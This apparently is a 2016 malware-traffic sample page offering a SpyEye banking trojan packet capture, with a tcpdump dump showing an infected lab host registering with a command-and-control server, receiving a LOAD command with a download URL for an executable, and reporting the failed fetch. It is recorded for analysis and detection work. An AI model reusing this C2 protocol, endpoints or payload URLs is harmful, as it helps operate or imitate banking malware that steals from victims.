SpyEye Banking Trojan Malware Traffic Sample PCAP Download

By | January 29, 2016

Download SpyEye Banking Trojan PCAP : spyeye.pcap

2010-02-13 09:23:18.490261 IP 192.168.242.131.56129 > 192.168.242.2.53: 32546+ A? www.whatsrunning.net. (38)
E..B…….A………A.5..F(.”………..www.whatsrunning.net…..
2010-02-13 09:23:18.575013 ARP, Request who-has 192.168.242.131 tell 192.168.242.2, length 46
………PV……………………………..
2010-02-13 09:23:18.575035 ARP, Reply 192.168.242.131 is-at 00:0c:29:8c:57:d8, length 28
……….).W……PV…….
2010-02-13 09:23:18.575271 IP 192.168.242.2.53 > 192.168.242.131.56129: 32546 2/0/0 CNAME whatsrunning.net., A 64.38.48.114 (68)
E..`!…………….5.A.L…”………..www.whatsrunning.net………………………….@&0r
2010-02-13 09:23:18.595196 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [S], seq 916714450, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….p….@&0r.n.P6…….p…46……….
2010-02-13 09:23:18.679275 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [S.], seq 1106594304, ack 916714451, win 64240, options [mss 1460], length 0
E..,!……d@&0r…..P.nA.J.6…`….6……..
2010-02-13 09:23:18.679353 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [.], ack 1, win 64240, length 0
E..(..@….w….@&0r.n.P6…A.J.P…….
2010-02-13 09:23:18.680440 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [P.], seq 1:227, ack 1, win 64240, length 226: HTTP: POST /whatsrunning/CheckNewVersion.aspx HTTP/1.0
E..
..@………@&0r.n.P6…A.J.P….B..POST /whatsrunning/CheckNewVersion.aspx HTTP/1.0
Connection: keep-alive
Content-Length: 9
Host: www.whatsrunning.net
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

2010-02-13 09:23:18.680693 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [.], ack 227, win 64240, length 0
E..(!……g@&0r…..P.nA.J.6…P………….
2010-02-13 09:23:18.680765 IP 192.168.242.131.1390 > 64.38.48.114.80: Flags [P.], seq 227:236, ack 1, win 64240, length 9: HTTP
E..1..@….l….@&0r.n.P6…A.J.P….?..3.0.0.966
2010-02-13 09:23:18.681047 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [.], ack 236, win 64240, length 0
E..(!……f@&0r…..P.nA.J.6…P………….
2010-02-13 09:23:19.063111 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [P.], seq 1:330, ack 236, win 64240, length 329: HTTP: HTTP/1.1 200 OK
E..q!…….@&0r…..P.nA.J.6…P…….HTTP/1.1 200 OK
Connection: keep-alive
Date: Sat, 13 Feb 2010 14:23:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=g1ccax3k5o4xtn3bwgjb4g24; path=/; HttpOnly
Cache-Control: private
Content-Type: text
Content-Length: 9

3.0.0.966
2010-02-13 09:23:19.170327 IP 64.38.48.114.80 > 192.168.242.131.1390: Flags [P.], seq 1:330, ack 236, win 64240, length 329: HTTP: HTTP/1.1 200 OK
E..q!…….@&0r…..P.nA.J.6…P…….HTTP/1.1 200 OK
Connection: keep-alive
Date: Sat, 13 Feb 2010 14:23:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=g1ccax3k5o4xtn3bwgjb4g24; path=/; HttpOnly
Cache-Control: private
Content-Type: text
Content-Length: 9

3.0.0.966

2010-02-13 09:23:39.455201 IP 192.168.242.131.56563 > 192.168.242.2.53: 43351+ A? nazarethimaging.com. (37)
E..A…….7………..5.-…W………..nazarethimaging.com…..
2010-02-13 09:23:39.543778 IP 192.168.242.2.53 > 192.168.242.131.56563: 43351 1/0/0 A 60.12.117.147 (53)
E..Q!…………….5…=…W………..nazarethimaging.com……………..<.u. 2010-02-13 09:23:39.545207 IP 192.168.242.131.1391 > 60.12.117.147.80: Flags [S], seq 4097880806, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….^….<.u..o.P.@......p...v|.......... 2010-02-13 09:23:39.841422 IP 60.12.117.147.80 > 192.168.242.131.1391: Flags [S.], seq 765348086, ack 4097880807, win 64240, options [mss 1460], length 0
E..,!……U<.u......P.o-.H..@..`............. 2010-02-13 09:23:39.841498 IP 192.168.242.131.1391 > 60.12.117.147.80: Flags [.], ack 1, win 64240, length 0
E..(..@….e….<.u..o.P.@..-.H.P...,... 2010-02-13 09:23:39.842860 IP 192.168.242.131.1391 > 60.12.117.147.80: Flags [P.], seq 1:843, ack 1, win 64240, length 842: HTTP: POST http://nazarethimaging.com/grab/websitechk.php HTTP/1.1
E..r..@………<.u..o.P.@..-.H.P....t..POST http://nazarethimaging.com/grab/websitechk.php HTTP/1.1 Host: nazarethimaging.com Connection: close Content-Type: multipart/form-data; boundary=55377776816118 Content-Length: 651 --55377776816118 Content-Disposition: form-data; name="bot_guid" SYSTEM!OWNER-CFD98CA45!90F056C2 --55377776816118 Content-Disposition: form-data; name="bot_version" 10072 --55377776816118 Content-Disposition: form-data; name="local_time" 2010.02.13 09:23:39.169 --55377776816118 Content-Disposition: form-data; name="timezone" E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e. --55377776816118 Content-Disposition: form-data; name="tick_time" 0001:06:46 --55377776816118 Content-Disposition: form-data; name="os_version" 5.1.2600 --55377776816118 Content-Disposition: form-data; name="language_id" 1033 --55377776816118-- 2010-02-13 09:23:40.129422 IP 60.12.117.147.80 > 192.168.242.131.1391: Flags [P.], seq 1:198, ack 843, win 64240, length 197: HTTP: HTTP/1.1 200 OK
E…!…….<.u......P.o-.H..@.1P...V[..HTTP/1.1 200 OK Date: Sat, 13 Feb 2010 14:26:44 GMT Server: Apache/2 X-Powered-By: PHP/5.2.12 Vary: Accept-Encoding,User-Agent Content-Length: 0 Connection: close Content-Type: text/html 2010-02-13 09:23:41.322908 IP 192.168.242.131.1392 > 60.12.117.147.80: Flags [P.], seq 1:242, ack 1, win 64240, length 241: HTTP: GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=6&ccrc=9038AAB0 HTTP/1.1
E…..@….m….<.u..p.P...08 ,jP.......GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=6&ccrc=9038AAB0 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: www.nazarethimaging.com 2010-02-13 09:23:41.323119 IP 60.12.117.147.80 > 192.168.242.131.1392: Flags [.], ack 242, win 64240, length 0
E..(!……R<.u......P.p8 ,j...!P...'......... 2010-02-13 09:23:41.689809 IP 60.12.117.147.80 > 192.168.242.131.1392: Flags [P.], seq 1:252, ack 242, win 64240, length 251: HTTP: HTTP/1.1 200 OK
E..#!……V<.u......P.p8 ,j...!P....3..HTTP/1.1 200 OK Date: Sat, 13 Feb 2010 14:26:46 GMT Server: Apache/2 X-Powered-By: PHP/5.2.12 Vary: Accept-Encoding,User-Agent Content-Length: 72 Content-Type: text/html LOAD
http://www.missboston.org/wp-includes/images/wlw/win.exe
1137
2010-02-13 09:23:41.722434 IP 192.168.242.131.60117 > 192.168.242.2.53: 44802+ A? www.missboston.org. (36)
E..@……………….5.,t#………….www
missboston.org…..
2010-02-13 09:23:41.739602 IP 192.168.242.2.53 > 192.168.242.131.60117: 44802 2/0/0 CNAME missboston.org., A 66.147.242.97 (66)
E..^!…………….5…J~)………….www
missboston.org………………………….B..a

E..(..@………B..a.q.P.MO.;.u5P….C..
2010-02-13 09:23:41.847908 IP 192.168.242.131.1393 > 66.147.242.97.80: Flags [P.], seq 1:116, ack 1, win 64240, length 115: HTTP: GET /wp-includes/images/wlw/win.exe HTTP/1.1
E…..@………B..a.q.P.MO.;.u5P…….GET /wp-includes/images/wlw/win.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: www.missboston.org

2010-02-13 09:23:41.848095 IP 66.147.242.97.80 > 192.168.242.131.1393: Flags [.], ack 116, win 64240, length 0
E..(!…..0.B..a…..P.q;.u5.MP.P………….
2010-02-13 09:23:41.944536 IP 66.147.242.97.80 > 192.168.242.131.1393: Flags [P.], seq 1:456, ack 116, win 64240, length 455: HTTP: HTTP/1.1 404 Not Found
E…!…../0B..a…..P.q;.u5.MP.P…….HTTP/1.1 404 Not Found
Date: Sat, 13 Feb 2010 14:23:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

af
404 Not Found

404 Not Found

The requested URL /wp-includes/images/wlw/win.exe does not exist.

0

2010-02-13 09:23:43.308833 IP 192.168.242.131.1394 > 60.12.117.147.80: Flags [P.], seq 1:244, ack 1, win 64240, length 243: HTTP: GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=LOAD-ERROR&tid=1137&rep=CreateProcess()%20fails&cpu=3&ccrc=9038AAB0 HTTP/1.1
E…..@…._….<.u..r.P....M[F.P...!...GET /com/bt_version_checker.php?guid=ADMINISTRATOR!OWNER-CFD98CA45!90F056C2&ver=10072&stat=LOAD-ERROR&tid=1137&rep=CreateProcess()%20fails&cpu=3&ccrc=9038AAB0 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: www.nazarethimaging.com 2010-02-13 09:23:43.309040 IP 60.12.117.147.80 > 192.168.242.131.1394: Flags [.], ack 244, win 64240, length 0
E..(!……F<.u......P.rM[F.....P............. 2010-02-13 09:23:43.661768 IP 60.12.117.147.80 > 192.168.242.131.1394: Flags [P.], seq 1:179, ack 244, win 64240, length 178: HTTP: HTTP/1.1 200 OK
E…!…….<.u......P.rM[F.....P.......HTTP/1.1 200 OK Date: Sat, 13 Feb 2010 14:26:48 GMT Server: Apache/2 X-Powered-By: PHP/5.2.12 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html 2010-02-13 09:23:43.761588 IP 60.12.117.147.80 > 192.168.242.131.1394: Flags [P.], seq 1:179, ack 244, win 64240, length 178: HTTP: HTTP/1.1 200 OK
E…!…….<.u......P.rM[F.....P.......HTTP/1.1 200 OK Date: Sat, 13 Feb 2010 14:26:48 GMT Server: Apache/2 X-Powered-By: PHP/5.2.12 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html

Share Button

One thought on “SpyEye Banking Trojan Malware Traffic Sample PCAP Download

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

Leave a Reply

Your email address will not be published. Required fields are marked *